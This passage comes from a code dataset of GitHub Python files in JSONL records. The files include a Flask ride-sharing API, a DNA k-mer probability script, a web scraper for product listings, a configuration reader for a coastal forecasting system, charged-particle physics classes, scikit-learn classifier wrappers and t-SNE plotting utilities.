jsonFile)\n\n\n@app.route('/api/v1/db/clear',methods=['POST'])\ndef clear_db():\n\tmeta = db.metadata\n\tfor table in reversed(meta.sorted_tables):\n\t\tdb.session.execute(table.delete())\n\tdb.session.commit()\n\tstatus_code = flask.Response(status=200)\n\twith open(\"count.json\", \"r\") as jsonFile:\n\t\tdata = json.load(jsonFile)\n\tdata[\"count\"] =data[\"count\"]+1\n\twith open(\"count.json\", \"w\") as jsonFile:\n\t\tjson.dump(data, jsonFile)\n\treturn status_code\n\n@app.route('/api/v1/db/read', methods=['POST'])\ndef read_db():\n\tdata = request.get_json(force=True)\n\tif(data['api']==\"4\"):\n\t\tread_data = db.session.query(Rider).all()\n\t\tride_data = dict()\n\t\tride_data['rideId'] = []\n\t\tride_data['created_by'] = []\n\t\tride_data['timestamp'] = []\n\t\tride_data['source'] = []\n\t\tride_data['destination'] = []\n\t\tfor ride in read_data:\n\t\t\tride_data['rideId'].append(ride.id)\n\t\t\tride_data['created_by'].append(ride.created_by)\n\t\t\tride_data['timestamp'].append(ride.timestamp)\n\t\t\tride_data['source'].append(ride.source)\n\t\t\tride_data['destination'].append(ride.destination)\n\t\treturn ride_data\n\tif(data['api']==\"5\"):\n\t\tride = db.session.query(Rider).filter_by(id=data['ride_id']).one()\n\t\tshared = db.session.query(Shared).filter_by(ride_id=data['ride_id']).all()\n\t\tl=[]\n\t\tfor share in shared:\n\t\t\tl.append(share.shared_by)\n\t\treturn jsonify(ride_Id=ride.id,Created_by=ride.created_by,users=l,Timestamp=ride.timestamp,source=d[ride.source],destination=d[ride.destination])\n\twith open(\"count.json\", \"r\") as jsonFile:\n\t\tdata = json.load(jsonFile)\n\tdata[\"count\"] =data[\"count\"]+1\n\twith open(\"count.json\", \"w\") as jsonFile:\n\t\tjson.dump(data, jsonFile)\n\n@app.route('/api/v1/_count',methods=['GET'])\ndef count():\n\twith open(\"count.json\", \"r\") as jsonFile:\n\t\tdata = json.load(jsonFile)\n\treturn jsonify(data[\"count\"])\n\n@app.route('/api/v1/_count',methods=['DELETE'])\ndef reset_count():\n\twith open(\"count.json\", \"r\") as jsonFile:\n\t\tdata = json.load(jsonFile)\n\tdata[\"count\"] =0\n\twith open(\"count.json\", \"w\") as jsonFile:\n\t\tjson.dump(data, jsonFile)\n\tstatus_code = flask.Response(status=201)\n\treturn status_code\n\nif __name__ == '__main__':\n\tapp.run(host='0.0.0.0',port=80,debug=True)\n","repo_name":"adivar99/CloudComputingProject","sub_path":"Assignment 3/Ride/rides.py","file_name":"rides.py","file_ext":"py","file_size_in_byte":8119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"73073243841","text":"import random \n\ndef hamming(seq1, seq2):\n distance = 0\n for nuc in range(len(seq1)):\n if seq1[nuc] != seq2[nuc]:\n distance += 1\n return distance\n\ndef profile_matrix(dna):\n seq_num = float(len(dna))\n nucs = ['A', 'C', 'G', 'T']\n profile_matrix = []\n for i in range(len(dna[0])):\n base_indeces = [seq[i] for seq in dna]\n profile_values = [float(base_indeces.count(nuc))/seq_num for nuc in nucs]\n profile_matrix.append(profile_values)\n return [list(i) for i in zip(*profile_matrix)]\n#sanitycheck = print(profile_matrix(dna = \"AAAATTTTTGGGGCCCCACTAGACTGGTTAGGAGCGCGTATGC\"))\ndef get_profile_dict(prof_matrix, pos):\n profile_dict = {'A': prof_matrix[0][pos], 'C': prof_matrix[1][pos], 'G': prof_matrix[2][pos], 'T': prof_matrix[3][pos]}\n return profile_dict\n\ndef find_probable_kmer(seq, k, prof_matrix):\n max_prob = 0 \n prob_list = [] \n for subset_pos in range(len(seq) - k+1):\n kmer_prob = 1 \n substring = seq[subset_pos:subset_pos+k]\n for pos in range(len(substring)):\n profile = get_profile_dict(prof_matrix, pos)\n kmer_prob = profile[substring[pos]]\n prob_list.append(kmer_prob)\n subset_pos = prob_list.index(max(prob_list))\n max_prob_kmer = seq[subset_pos:subset_pos + k]\n return max_prob_kmer\nsanitycheck = print(find_probable_kmer(seq = 'AAGGCCTATGATGATGATGATGATAGGTAGACGATCGATATAGCGATCGGGATCGGATCGGATCGGATCGAGATTAGGCTAGGCTAAAGTCTCCTAGTAAAGAGACTAGTAGATGATGATGATGATGCTGCGCGCGCGCGTGCTGCTGAGCAACGATTAGGCCG', k = 3, prof_matrix = profile_matrix('AAGGCCTATGATGATGATGATGATAGGTAGACGATCGATATAGCGATCGGGATCGGATCGGATCGGATCGAGATTAGGCTAGGCTAAAGTCTCCTAGTAAAGAGACTAGTAGATGATGATGATGATGCTGCGCGCGCGCGTGCTGCTGAGCAACGATTAGGCCG')))","repo_name":"tevinflom/bioinformatics_toolkit","sub_path":"toolkit/hiddenmessages_dna/sussy.py","file_name":"sussy.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"41758650697","text":"from importlib import import_module\nimport requests\nimport_module\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nbaseurl = 'https://www.bol.com/'\n\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'\n}\n\nproductlinks = []\n\nfor x in range(1,109):\n r = requests.get(f'https://www.bol.com/nl/s/?searchtext=beard+balm&searchContext=media_all&appliedSearchContextId=&suggestFragment=&adjustedSection=&originalSection=&originalSearchContext=§ion=main&N=0&defaultSearchContext=media_all?page={x}')\n soup = BeautifulSoup(r.content, 'lxml')\n productlist = soup.find_all('div', class_='product-item__info hit-area')\n for item in productlist:\n for link in item.find_all('a', href=True):\n productlinks.append(baseurl + link['href'])\n\nprint(len(productlinks))\n#print(productlinks)\n\ntestlink = 'https://www.bol.com/nl/s/?searchtext=beard+balm&searchContext=media_all&appliedSearchContextId=&suggestFragment=&adjustedSection=&originalSection=&originalSearchContext=§ion=main&N=0&defaultSearchContext=media_all'\nr = requests.get(testlink, headers=headers)\nsoup = BeautifulSoup(r.content, 'lxml')\nname=soup.find('h1', class_='page-heading')\nrating=soup.find('div', class_='rating-horizontal__average-score')\nprice = soup.find('section', class_='price-block price-block--large')\nprint(name,price, rating)\n","repo_name":"harshakantipudi/class","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"23987526230","text":"#\r\n# File: m_init_reader.py\r\n#\r\n# Created: October 4th, 2021\r\n#\r\n# Author: Fernando Mendonça (fmmendonca@ualg.pt)\r\n#\r\n# Purpose: Read and check inputs from SMS-Coastal initializion file.\r\n# Save inputs in a binary pickle file.\r\n#\r\n\r\nimport json\r\nimport pickle\r\nfrom os import getcwd, path\r\nfrom time import time\r\nfrom datetime import datetime, timedelta\r\n\r\n\r\nclass Reader:\r\n def __init__(self):\r\n \"\"\"Class to read and check the inputs from the SMS-Coastal\r\n initialization file (init.json).\r\n \"\"\"\r\n\r\n # Set attributes:\r\n self.forc = {}\r\n self.sim = {}\r\n self.datm = {}\r\n self.public = {\r\n \"root\": getcwd(),\r\n \"base\": path.basename(getcwd()),\r\n \"timer\": time()\r\n }\r\n\r\n # Read json file:\r\n self.inpts = json.load(open(\"init.json\", \"rb\"))\r\n self.inpts: dict\r\n \r\n def rdpublic(self) -> int:\r\n \"\"\"Check the inputs inside 'public' section of SMS-Coastal\r\n initialization file. Return a status code.\r\n \"\"\"\r\n \r\n print(\"Check inputs from 'public' section of 'init.json'.\")\r\n inpts = self.inpts.get(\"public\")\r\n\r\n # Check operation type:\r\n key = \"optype\"\r\n val = inpts.get(key)\r\n vals = (\"forc\", \"sim\", \"simr\", \"data\")\r\n \r\n if not val:\r\n print(\"ERROR: operation type is not defined.\")\r\n return 1\r\n elif not isinstance(val, str) or val.lower() not in vals:\r\n print(\"ERROR: invalid operation type.\")\r\n return 1\r\n \r\n self.public.update({key: val.lower()})\r\n \r\n # Check operatrion date:\r\n key = \"opdate\"\r\n val = inpts.get(key)\r\n \r\n if not val:\r\n val = datetime.today().strftime(\"%Y %m %d\")\r\n elif not isinstance(val, str):\r\n print(\"ERROR: invalid type of operation date.\")\r\n return 1\r\n \r\n try:\r\n val = datetime.strptime(val, \"%Y %m %d\")\r\n except ValueError:\r\n print(\"ERROR: invalid format of operation date.\")\r\n return 1\r\n \r\n if val.date() > datetime.today().date():\r\n print(\"ERROR: operation date can't be greater than today.\")\r\n return 1\r\n \r\n self.public.update({key: val})\r\n\r\n # Get email addresses for report:\r\n key = \"email\"\r\n vals = inpts.get(key)\r\n if not vals: vals = []\r\n\r\n if not isinstance(vals, list):\r\n print(\"ERROR: invalid type of 'email'.\")\r\n return 1\r\n\r\n for val in vals:\r\n if isinstance(val, str): continue\r\n print(\"ERROR: invalid type in 'email'.\")\r\n return 1\r\n self.public.update({key: vals})\r\n\r\n # Check forecast range:\r\n key = \"forecast\"\r\n val = inpts.get(key)\r\n if val is None: val = 0\r\n \r\n if not isinstance(val, int) or val < 0:\r\n print(\"ERROR: invalid forecast range value.\")\r\n return 1\r\n \r\n self.public.update({key: val})\r\n\r\n # Check restart ranges:\r\n key = \"restart\"\r\n vals = inpts.get(key)\r\n if not vals: vals = [0,]\r\n\r\n if not isinstance(vals, list):\r\n print(\"ERROR: invalid type of 'restart'.\")\r\n return 1\r\n \r\n for val in vals:\r\n if isinstance(val, int) and val >= 0: continue\r\n print(\"ERROR: invalid type in 'restart'.\")\r\n return 1\r\n \r\n self.public.update({key: vals})\r\n\r\n # Check model number of levels.\r\n # Same as 'forecast' but different error message:\r\n key = \"levels\"\r\n val = inpts.get(key)\r\n if val is None: val = 0\r\n\r\n if not isinstance(val, int) or val < 0:\r\n print(\"ERROR: invalid number of model levels.\")\r\n return 1\r\n \r\n self.public.update({key: val})\r\n\r\n # Check type of the model in 'modtype':\r\n key = \"modtype\"\r\n val = inpts.get(key)\r\n \r\n if not val:\r\n val = \"1\"\r\n elif val not in (\"1\", \"2\"):\r\n print(\"ERROR: invalid type of model.\")\r\n return 1\r\n \r\n self.public.update({key: val})\r\n\r\n # Check restart operation in 'rstday':\r\n vals = (\"mon\", \"tue\", \"wed\", \"thu\", \"fri\", \"sat\", \"sun\")\r\n val = inpts.get(\"rstday\")\r\n \r\n if self.public.get(\"optype\") == \"simr\":\r\n val = self.public.get(\"opdate\").strftime(\"%a\").lower()\r\n # This way rston will always be True.\r\n elif not val:\r\n val = self.public.get(\"opdate\") - timedelta(1)\r\n val = val.strftime(\"%a\").lower()\r\n # rston will always be False.\r\n\r\n if val not in vals:\r\n print(\"ERROR: invalid value of restart day.\")\r\n return 1\r\n\r\n # Define restart switch:\r\n if self.public.get(\"opdate\").strftime(\"%a\").lower() == val:\r\n val = True\r\n else:\r\n val = False\r\n \r\n self.sim.update({\"rston\": val})\r\n return 0\r\n\r\n def svpkl(self) -> None:\r\n \"\"\"Save class dictionary attributes in a binary pickle file.\"\"\"\r\n \r\n data = {\r\n \"public\": self.public, \"forc\": self.forc,\r\n \"sim\": self.sim, \"data\": self.datm,\r\n }\r\n pickle.dump(data, open(\"init.pkl\", \"wb\"))\r\n\r\n def rdforc(self) -> int:\r\n \"\"\"Check the inputs inside 'forc' section of SMS-Coastal\r\n initialization file. Return a status code.\r\n \"\"\"\r\n\r\n print(\"Check inputs from 'forc' section of 'init.json'.\")\r\n # SMS-coastal sources library:\r\n lib = {\r\n \"MERCATOR\": {\"fctrg\": 9, \"iniat\": 12},\r\n \"MERCATORH\": {\"fctrg\": 8, \"iniat\": 23.5},\r\n \"AMSEAS\": {\"fctrg\": 3, \"iniat\": 0}, \r\n \"SKIRON\": {\"fctrg\": 7, \"iniat\": 0},\r\n \"NAM\": {\"fctrg\": 2, \"iniat\": 0},\r\n \"GFS\": {\"fctrg\": 14, \"iniat\": 1},\r\n }\r\n # Forecast range ('fctrg') is the x of D+x.\r\n # if x = 2 -> D+2 -> run for 3 days.\r\n\r\n # Check sources:\r\n forc = self.inpts.get(\"forc\", {})\r\n srcs = forc.get(\"sources\")\r\n if not srcs: srcs = {}\r\n\r\n if not srcs:\r\n print(\"WARNING: no data source defined.\")\r\n self.sim.update({\"skip\": True})\r\n return 0\r\n \r\n # Check each source:\r\n srcsout = {}\r\n\r\n for key in srcs:\r\n # Error if source is not in SMS-Coastal library:\r\n if key.upper() not in lib.keys():\r\n print(\r\n f\"ERROR: '{key}' is not available in the library.\",\r\n )\r\n return 1\r\n\r\n # Check parameters:\r\n src = cksrc(key, srcs.get(key))\r\n if not src: return 1\r\n \r\n # Update sources output:\r\n srcsout.update({key.upper(): src})\r\n \r\n # Update forc attribute:\r\n self.forc.update({\"sources\": srcsout})\r\n\r\n # Check grid limits in 'latlim' and 'lonlim':\r\n grid = []\r\n keys = (\"latlim\", \"lonlim\")\r\n for key in keys:\r\n vals = forc.pop(key, None)\r\n if vals is None or not isinstance(vals, list):\r\n print(f\"ERROR: invalid type of '{key}'.\")\r\n return 1\r\n elif len(vals) != 2:\r\n print(f\"ERROR: invalid shape of '{key}'.\")\r\n return 1 \r\n # Check each value:\r\n for val in vals:\r\n if isinstance(val, (int, float)): continue\r\n print(f\"ERROR: invalid type in '{key}'.\")\r\n return 1\r\n # Update grid:\r\n vals.sort()\r\n grid += vals\r\n self.forc.update({\"grid\": grid})\r\n\r\n # Check switch to skip Forcing Layer at Simulation one:\r\n val = forc.pop(\"skip\", False)\r\n if val not in (True, False): val = False\r\n self.sim.update({\"skip\": val})\r\n\r\n # Sort sources by download start time:\r\n val = {}\r\n for srcid in srcsout:\r\n val.update({srcid: srcsout.get(srcid).get(\"start\")})\r\n val = list(dict(sorted(val.items(), key=lambda src: src[1])).keys())\r\n # val.items gives a list of tuples [(key1, val1), (key2, val2)]\r\n # and src in lambda function is each of that pairs.\r\n # so src[1] is to sort by the second position of the pairs.\r\n \r\n # Update attributes:\r\n self.forc.update({\"order\": val})\r\n self.sim.update({\"sources\": val})\r\n\r\n # Check data initial time and difference in forecast range\r\n # for Simulation Manager.\r\n # Get the latest time between sources:\r\n iniat = []\r\n fctrg = []\r\n fctdt = 0\r\n\r\n for srcid in srcsout:\r\n iniat.append(lib.get(srcid).get(\"iniat\"))\r\n fctrg.append(lib.get(srcid).get(\"fctrg\"))\r\n\r\n iniat.sort(reverse=True)\r\n if iniat.count(iniat[0]) != len(iniat):\r\n # Sources begin at different time, lose one forecast day:\r\n fctdt += -1\r\n iniat = iniat[0]\r\n\r\n # Get the lowest forecast range between sources:\r\n fctrg.sort()\r\n fctrg = fctrg[0]\r\n\r\n # Compare with public section:\r\n fct = self.public.get(\"forecast\")\r\n opdate = self.public.get(\"opdate\") + timedelta(hours=iniat)\r\n\r\n # Check forecast range:\r\n if fct > fctrg:\r\n fct = fctrg\r\n print(f\"WARNING: forecast range updated to {fct} day(s).\")\r\n if fctdt < 0:\r\n fct += fctdt\r\n print(\r\n \"WARNING: data sources initial time don't match.\",\r\n f\"Forecast range updated to {fct} day(s).\",\r\n )\r\n self.public.update({\"opdate\": opdate, \"forecast\": fct})\r\n\r\n # Build dates:\r\n rst = 0\r\n for val in self.public.get(\"restart\"): rst += val\r\n self.forc.update({\r\n \"ini\": (opdate - timedelta(rst)).date(),\r\n \"fin\": (opdate + timedelta(fct)).date(),\r\n })\r\n\r\n return 0\r\n\r\n def rdsim(self) -> int:\r\n return 0\r\n\r\n def rddatm(self) -> int:\r\n return 0\r\n\r\n\r\ndef cksrc(srcid: str, params: dict) -> int:\r\n \"\"\"Check the parameters of only one source.\r\n \r\n Keywords arguments:\r\n srcid -- name of the inputed source;\r\n params -- parameters of a source.\r\n \"\"\"\r\n\r\n # Extract parameters:\r\n start = 0 if not params.get(\"start\") else params.get(\"start\")\r\n swtch_old = [\r\n params.pop(\"tohdf\", False), params.pop(\"tomodel\", False),\r\n params.pop(\"tots\", False), params.pop(\"merge\", False),\r\n ]\r\n swtch_new = []\r\n batims = [] if not params.get(\"batims\") else params.get(\"batims\")\r\n geomt = \"\" if not params.get(\"geomt\") else params.get(\"geomt\")\r\n tsloc = [0, 0] if not params.get(\"tsloc\") else params.get(\"tsloc\")\r\n special = [] if not params.get(\"special\") else params.get(\"special\")\r\n cred = [\"u\", \"p\"] if not params.get(\"cred\") else params.get(\"cred\")\r\n\r\n #\r\n # Check start:\r\n if not isinstance(start, (int, float)):\r\n print(f\"ERROR: invalid type of 'start' for '{srcid}'.\")\r\n return {}\r\n if not 0 <= start < 24:\r\n print(f\"ERROR: 'start' is out of range for '{srcid}'.\")\r\n return {}\r\n\r\n #\r\n # Check boolean parameters:\r\n for param in swtch_old:\r\n val = param\r\n if val not in (True, False): val = False\r\n swtch_new.append(val)\r\n \r\n # 'merge' is True if any other switch is True:\r\n if True in swtch_new[:-1]: swtch_new[-1] = True\r\n\r\n # Check bathymetry and geometry file paths.\r\n # Check instances:\r\n if not isinstance(batims, list) or not isinstance(geomt, str):\r\n print(\r\n f\"ERROR: invalid type of 'batims' or 'geomt' for '{srcid}'.\",\r\n )\r\n return {}\r\n\r\n for val in batims:\r\n if isinstance(val, str): continue\r\n print(f\"ERROR: invalid type in 'batims' for '{srcid}'.\")\r\n return {}\r\n \r\n # Check if they are mandatory and values:\r\n if True in swtch_new[:2]:\r\n if not batims:\r\n print(\r\n f\"ERROR: missing values in 'batims' for '{srcid}'.\",\r\n )\r\n return {}\r\n for val in batims:\r\n if path.isfile(val): continue\r\n print(\r\n f\"ERROR: bathymetry file not found for '{srcid}'.\",\r\n )\r\n return {}\r\n\r\n if swtch_new[1] and not path.isfile(geomt):\r\n print(f\"ERROR: geometry file not found for '{srcid}'.\")\r\n return {}\r\n\r\n # Check tsloc:\r\n if not isinstance(tsloc, list) or len(tsloc) != 2:\r\n print(\r\n f\"ERROR: invalid type/shape of 'tsloc' for '{srcid}'.\",\r\n )\r\n return {}\r\n for val in tsloc:\r\n if isinstance(val, int): continue\r\n print(f\"ERROR: invalid type in 'tsloc' for '{srcid}'.\")\r\n return {}\r\n\r\n #\r\n # Check special operations:\r\n if not isinstance(special, list):\r\n print(f\"ERROR: invalid type of 'special' for '{srcid}'.\")\r\n return {}\r\n for val in special:\r\n if isinstance(val, str): continue\r\n print(f\"ERROR: invalid type in 'special' for '{srcid}'.\")\r\n return {}\r\n\r\n #\r\n # Check download credentials:\r\n if not isinstance(cred, list) or len(cred) != 2:\r\n print(f\"ERROR: invalid type/shape of 'cred' for '{srcid}'.\")\r\n return {}\r\n for val in special:\r\n if isinstance(val, str): continue\r\n print(f\"ERROR: invalid type in 'cred' for '{srcid}'.\")\r\n return {}\r\n\r\n return {\r\n \"start\": start,\r\n \"tohdf\": swtch_new[0], \"tomodel\": swtch_new[1],\r\n \"tots\": swtch_new[2], \"merge\": swtch_new[3],\r\n \"batims\": batims, \"geomt\": geomt, \"tsloc\": tsloc,\r\n \"special\": special, \"cred\": cred,\r\n }\r\n","repo_name":"fmmendonca/SMS-Coastal","sub_path":"Dev/m_init_reader.py","file_name":"m_init_reader.py","file_ext":"py","file_size_in_byte":13888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"27230111409","text":"import numpy as np\r\nimport math\r\nimport copy\r\nimport scipy.constants\r\nfrom Particle import Particle\r\n\r\nclass Chargedparticle(Particle):\r\n\r\n eCharge=scipy.constants.e\r\n \r\n def __init__(self, Position=np.array([0,0,0], dtype=float),\r\n Velocity=np.array([0,0,0], dtype=float),\r\n Acceleration=np.array([0,0,0], dtype=float),\r\n Name='Ball',\r\n Mass=scipy.constants.m_p,\r\n Charge=eCharge):\r\n super().__init__(Position=Position, Velocity=Velocity, Acceleration=Acceleration, Name=Name, Mass=Mass)\r\n self.Charge=Charge\r\n\r\n def __repr__(self):\r\n return 'Charged Particle: {0}, Mass: {1.12.3e}, Charge:{2.12.3e}, Position: {3}, Velocity: {4}, Acceleration: {5}'.format(self.Name, self.mass,self.Charge,self.position,self.velocity,self.acceleration)\r\n\r\nclass Proton(Chargedparticle):\r\n\r\n def __init__(self, Position=np.array([0,0,0], dtype=float),\r\n Velocity=np.array([0,1000,0], dtype=float),\r\n Acceleration=np.array([0,0,0], dtype=float),\r\n Name='Proton'):\r\n Mass=scipy.constants.m_p\r\n Charge = scipy.constants.e\r\n super().__init__(Position=Position, Velocity=Velocity, Acceleration=Acceleration, Name=Name, Mass=Mass,Charge=Charge)","repo_name":"Lancaster-Physics-Phys389-2020/phys389-2020-project-Jack-Fannon","sub_path":"Chargedparticle.py","file_name":"Chargedparticle.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"5495422485","text":"from sklearn import svm, neighbors, tree\r\n\r\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis, LinearDiscriminantAnalysis\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom IPython.display import Image\r\nimport pydotplus\r\n\r\nimport main\r\n\r\nclass Classifiers:\r\n\r\n classifier_names = [\"\", \"LDA\", \"SVM\", \"SGD\", \"KN\", \"DT\", \"RF\", \"MLP\", \"QDA\"]\r\n\r\n def __init__(self):\r\n a=1\r\n\r\n #it returns y_pedict\r\n def run_classifier(self, x_train, y_train, x_test, classifier=1):\r\n s = Classifiers\r\n #y_pred = []\r\n if classifier==1:\r\n #print(\"LDA\")\r\n return s.LDA_classifier(self, x_train, y_train, x_test, solver=\"lsqr\", shrinkage=0.5, store_covariance=True)\r\n elif classifier == 2:\r\n #print(\"SVM\")\r\n return s.SVM_classifier(self, x_train, y_train, x_test)\r\n elif classifier == 3:\r\n #print(\"SGD\")\r\n return s.sgd_classifier(self, x_train, y_train, x_test, loss=\"hinge\", penalty=\"l2\")\r\n elif classifier == 4:\r\n #print(\"KN\")\r\n return s.kNeighbors_classifier(self, x_train, y_train, x_test, n_neighbors=15)\r\n elif classifier == 5:\r\n #print(\"DT\")\r\n return s. DT_classifier(self, x_train, y_train, x_test)\r\n elif classifier == 6:\r\n #print(\"RF\")\r\n return s.RF_classifier(self, x_train, y_train, x_test)\r\n elif classifier == 7:\r\n #print(\"MLP\")\r\n return s.multiLayerPerceptron_classifier(self, x_train, y_train, x_test)\r\n elif classifier == 8:\r\n #print(\"QDA\")\r\n return s.QDA_classifier(self, x_train, y_train, x_test)\r\n elif classifier == 9:\r\n print(\"NO CLASSIFIER\")\r\n elif classifier == 10:\r\n print(\"NO CLASSIFIER\")\r\n #return y_pred\r\n\r\n\r\n #8 Quadratic Discriminant Analysis\r\n def QDA_classifier(self, x_train, y_train, x_test):\r\n print('QDA')\r\n qda = QuadraticDiscriminantAnalysis(store_covariances=True)\r\n return qda.fit(x_train, y_train).predict(x_test) #y_predict\r\n\r\n\r\n #1 Linear Discriminant Analysis\r\n def LDA_classifier(self, x_train, y_train, x_test, solver=\"lsqr\", shrinkage=0.5, store_covariance=True):\r\n print('LDA')\r\n lda = LinearDiscriminantAnalysis(solver=solver, shrinkage=shrinkage, store_covariance=store_covariance)\r\n # l = LinearDiscriminantAnalysis(solver='svd', n_components=2)\r\n # l = LinearDiscriminantAnalysis(solver='eigen', shrinkage=0.8, n_components=2)\r\n lda.fit(x_train, y_train)\r\n y_pred = lda.predict(x_test)\r\n return y_pred\r\n\r\n\r\n #2\r\n def SVM_classifier(self, x_train, y_train, x_test):\r\n print('SVM')\r\n #kernel = ‘linear’, ‘poly’, ‘rbf’, ‘sigmoid’, ‘precomputed'\r\n #clf = svm.SVC(C=1.0, kernel='linear', degree=2, gamma='auto', coef0=0.0, shrinking=True,\r\n # probability=False, tol=0.0001, cache_size=300, class_weight=None, verbose=False,\r\n # max_iter=-1, decision_function_shape=None, random_state=None)\r\n #clf = svm.LinearSVC(class_weight='balanced', max_iter=10000)\r\n clf = svm.LinearSVC()\r\n #clf = svm.NuSVC()\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n y_pred = clf.predict(x_test)\r\n return y_pred\r\n\r\n\r\n #3 Stochastic Gradient Descent\r\n def sgd_classifier(self, x_train, y_train, x_test, loss=\"hinge\", penalty=\"l2\"):\r\n print('SGD')\r\n clf = SGDClassifier(loss=loss, penalty=penalty)\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n y_pred = clf.predict(x_test)\r\n return y_pred\r\n\r\n\r\n #4\r\n def kNeighbors_classifier(self, x_train, y_train, x_test, n_neighbors=15):\r\n print('KNN')\r\n clf = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors)\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n y_pred = clf.predict(x_test)\r\n return y_pred\r\n\r\n\r\n #5 Decision Tree\r\n def DT_classifier(self, x_train, y_train, x_test):\r\n print('DT')\r\n #clf = tree.ExtraTreeClassifier(criterion='gini')\r\n clf = tree.DecisionTreeClassifier(criterion='gini')\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n y_pred = clf.predict(x_test)\r\n return y_pred\r\n\r\n\r\n #Print Decision Tree\r\n def DT_classifier_printTree(self, x_train, y_train, feature_names, target_values, printFor='tenor', pdfName = \"DT.pdf\"):\r\n print('Print Decision Tree')\r\n clf = tree.DecisionTreeClassifier()\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n target_names = []\r\n if printFor=='tenor' or printFor=='gender':\r\n target_names = target_values\r\n else: #for simile\r\n for n in target_values:\r\n target_names.append(str(int(n)))\r\n print(feature_names)\r\n #print(target_names)\r\n #print(x_train)\r\n #dot_data = tree.export_graphviz(clf, out_file=None,\r\n # feature_names=feature_names,\r\n # class_names=target_names,\r\n # filled=True, rounded=True,\r\n # special_characters=True)\r\n #dot_data = tree.export_graphviz(clf, out_file=None)\r\n dot_data = tree.export_graphviz(clf, out_file=None, feature_names=feature_names)\r\n graph = pydotplus.graph_from_dot_data(dot_data)\r\n graph.write_pdf(pdfName)\r\n graph = pydotplus.graph_from_dot_data(dot_data)\r\n Image(graph.create_png())\r\n\r\n\r\n #7\r\n def multiLayerPerceptron_classifier(self, x_train, y_train, x_test):\r\n print('MLP')\r\n clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(20,), random_state=1, max_iter=500)\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n y_pred = clf.predict(x_test)\r\n return y_pred\r\n\r\n\r\n #6 Random forest\r\n def RF_classifier(self, x_train, y_train, x_test):\r\n print('RF')\r\n clf = RandomForestClassifier(n_estimators=100, max_depth=None, min_samples_split=2, max_features='auto', random_state=0)\r\n clf.fit(x_train, y_train) # .transform(x_train)\r\n y_pred = clf.predict(x_test)\r\n return y_pred","repo_name":"pkouris/SimilePy","sub_path":"Classifiers.py","file_name":"Classifiers.py","file_ext":"py","file_size_in_byte":6356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"124824058","text":"import argparse\nimport pandas as pd\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nimport numpy as np\nfrom scipy.io import arff\nfrom pathlib import Path\n\n\nis_anomaly_column = 'is_anomaly'\n\n\ndef arff_to_csv(arff_dataset_path):\n data = arff.loadarff(arff_dataset_path)\n df = pd.DataFrame(data[0])\n path = Path(arff_dataset_path)\n outputdir = path.parent\n basename = os.path.basename(path)\n file_name, ext = os.path.splitext(basename)\n outputfile = os.path.join(outputdir, file_name + '.csv')\n df.to_csv(outputfile, index=False)\n\n\ndef tsne_visualizer(df, savedir):\n final_df = df.iloc[:, 0:df.shape[1]-2]\n feat_cols = list(range(final_df.shape[1]))\n final_df['y'] = df.iloc[:, df.shape[1]-1]\n final_df['label'] = final_df['y'].apply(lambda i: str(i))\n tsne_results = TSNE(n_components=2, random_state=0, perplexity=50).fit_transform(df.iloc[:, feat_cols])\n\n final_df['tsne-2d-one'] = tsne_results[:, 0]\n final_df['tsne-2d-two'] = tsne_results[:, 1]\n\n colors = [\"#383838\", \"#FF0B04\"]\n\n sns.scatterplot(\n x=\"tsne-2d-one\", y=\"tsne-2d-two\",\n hue=\"y\",\n palette=sns.color_palette(colors),\n data=final_df,\n legend=\"full\",\n )\n\n dataset_name = os.path.splitext(os.path.basename(f))[0]\n output = os.path.join(savedir, 'tsne_' + dataset_name + '.png')\n if not os.path.exists(savedir):\n os.makedirs(savedir)\n\n plt.title(dataset_name)\n plt.savefig(output, dpi=300)\n plt.clf()\n\n\ndef dataset_visualizer(dataset_path, savedir):\n fileslist = get_files(dataset_path)\n for f in fileslist:\n tsne_visualizer(pd.read_csv(f), savedir)\n\n\ndef plot_2d_subspace(path_to_df, dims_str):\n df = pd.read_csv(path_to_df)\n dims = list(map(int, dims_str.strip().replace('[', '').replace(']', '').split(',')))\n x = df[df.columns[dims[0]]]\n y = df[df.columns[dims[1]]]\n\n n = list(range(df.shape[0]))\n\n ind = np.where(df[is_anomaly_column] == 1)[0]\n text_ind = ind\n\n colors = np.array(['dimgray'] * df.shape[0], dtype=object)\n\n colors[ind] = 'red'\n\n fig, ax = plt.subplots()\n for i in range(len(x)):\n z_order = 2 if i in ind else 0\n color = colors[i]\n ax.scatter(x[i], y[i], c=color, zorder=z_order)\n\n for i, label in enumerate(n):\n if i in text_ind:\n ax.annotate(label, xy=(x[i], y[i]), c='dodgerblue', zorder=2)\n #plt.title(os.path.splitext(os.path.basename(dataset_path))[0])\n plt.xlabel('Feature ' + str(dims[0]))\n plt.ylabel('Feature ' + str(dims[1]))\n plt.show()\n #plt.savefig('visualizations/breast'+str(dims[0])+str(dims[1])+'.png', 